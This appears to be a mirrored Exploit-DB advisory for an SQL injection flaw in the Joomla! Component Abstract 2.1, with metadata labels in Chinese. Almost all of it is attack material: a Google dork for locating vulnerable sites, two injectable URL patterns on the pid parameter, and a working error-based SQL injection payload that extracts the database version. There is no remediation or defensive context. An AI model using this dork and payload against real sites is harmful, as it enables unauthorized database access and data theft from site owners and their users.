Joomla! Component Abstract 2.1 – SQL Injection

  • 作者: Ihsan Sencan
    日期: 2017-03-02
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/41493/
  • # # # # # 
    # Exploit Title: Joomla! Component Abstract v2.1 - SQL Injection
    # Google Dork: inurl:index.php?option=com_abstract
    # Date: 02.03.2017
    # Vendor Homepage: http://joomla6teen.com/
    # Software: https://extensions.joomla.org/extensions/extension/calendars-a-events/events/abstract-manager/
    # Demo: http://demo.joomla6teen.com/abstractmanager
    # Version: 2.1
    # Tested on: Win7 x64, Kali Linux x64
    # # # # # 
    # Exploit Author: Ihsan Sencan
    # Author Web: http://ihsan.net
    # Author Mail : ihsan[@]ihsan[.]net
    # # # # #
    # SQL Injection/Exploit :
    # http://localhost/[PATH]/index.php?option=com_abstract&view=conferences&layout=detail&pid=[SQL]
    # http://localhost/[PATH]/index.php?option=com_abstract&view=conferences&task=contactEmail&pid=[SQL]
    # 1+OR+1+GROUP+BY+CONCAT_WS(0x3a,0x496873616e53656e63616e,VERSION(),FLOOR(RAND(0)*2))+HAVING+MIN(0)+OR+1
    # # # # #